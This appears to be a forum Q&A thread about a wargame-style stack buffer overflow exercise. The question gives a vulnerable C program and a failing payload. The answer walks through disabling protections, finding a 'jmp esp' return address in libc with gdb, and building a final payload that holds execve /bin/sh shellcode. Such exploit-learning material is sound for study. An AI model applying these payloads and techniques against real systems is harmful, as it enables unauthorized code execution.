My payload for buffer overflow seems to be not working

Question

I am trying a buffer overflow on the following program:

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[]){
    char buffer[40];
    int i;

if(argc < 2){
    printf("argv error\n");
    exit(0);
}

// egghunter 
for(i=0; environ[i]; i++)
    memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')
{
    printf("stack is still your friend.\n");
    exit(0);
}
strcpy(buffer, argv[1]); 
printf("%s\n", buffer);
}

I used this payload to try overflowing the buffer,

./orc `perl -e 'print"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'``perl -e 'print "\x90"x9, **"\xac\xfa\xff\xbf"'`** 

However, it seems to be not working and only gives me this result.

j
 X?Rh//shh/bin??S?訴???????????

Yes, it's almost my first time trying a BOf, and I feel like that the ret adress which is at the end of the payload(bold) seems inaccurate. So, how do you get the ret adress to put at the end of the shellcode? And what does it do? Thanks in advance :)

Answer 1

I couldn't tell you if your return code is correct or not as I don't know where you're planning on returning.

Compiling this code with "-fno-stack-protector -z execstack" and address ASLR disabled (echo 0 > /proc/sys/kernel/randomize_va_space) my buffer looks like the following:

# ./orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')

Running it up in gdb (gdb --args orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')) and dumping esp (x/100x $esp) shows that it points to the area of the buffer directly after the return address so if you could find a RET %ESP instruction somewhere in memory, having your return address point to it would drop you directly back to your buffer.

To find a suitable return address, you can do the following (again assuming that ASLR has been disabled):

1. Find the address of the linked libraries - on my box this shows:

   # ldd orc
   linux-gate.so.1 =>  (0xb7fff000)
   libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e80000)
   /lib/ld-linux.so.2 (0x80000000)
   

2. Search the address provided for libc (0xb7e80000) for the RET %ESP instruction from within gdb using "find /b [start-search-address], [end-search-address], [stuff-to-search-for]".

   # gdb --args orc $(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\xCC"*40')
   gdb$ b main
   Breakpoint 1 at 0x8048555: file orc.c, line 12
   gdb$ r
   Breakpoint 1, main (argc=0x2, argv=0xbffff4e4) at orc.c:12
   12      if (argc < 2)
   gdb$ find /b 0xb7e80000, 0xb7fff000, 0xff, 0xe4
   0xb7f88a0f
   0xb7f96b73
   0xb7f96bf3
   ...
   0xb7f96df3
   0xb7f975f3
   0xb7f97673
   

3. Pick one for the return address - I selected the first one '0xb7f88a0f' which is plumbed into the buffer as '\x0f\x8a\xf8\xb7'.

This should drop you on your buffer which you can verify once again by placing a bunch of breakpoints ('\xCC') in after the return address and running the program in gdb as shown above. Execution should break on the address immediately following your return address. Verify with:

gdb$ x/8x $eip-4
0xbffff43c: 0xb7f88a0f  0xcccccccc  0xcccccccc  0xcccccccc
0xbffff44c: 0xcccccccc  0xcccccccc  0xcccccccc  0xcccccccc

You should see your return address at EIP - 4 bytes and the final buffer should look like this (no need for the nops):

$(python -c 'print "A"*56 + "\x0f\x8a\xf8\xb7" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')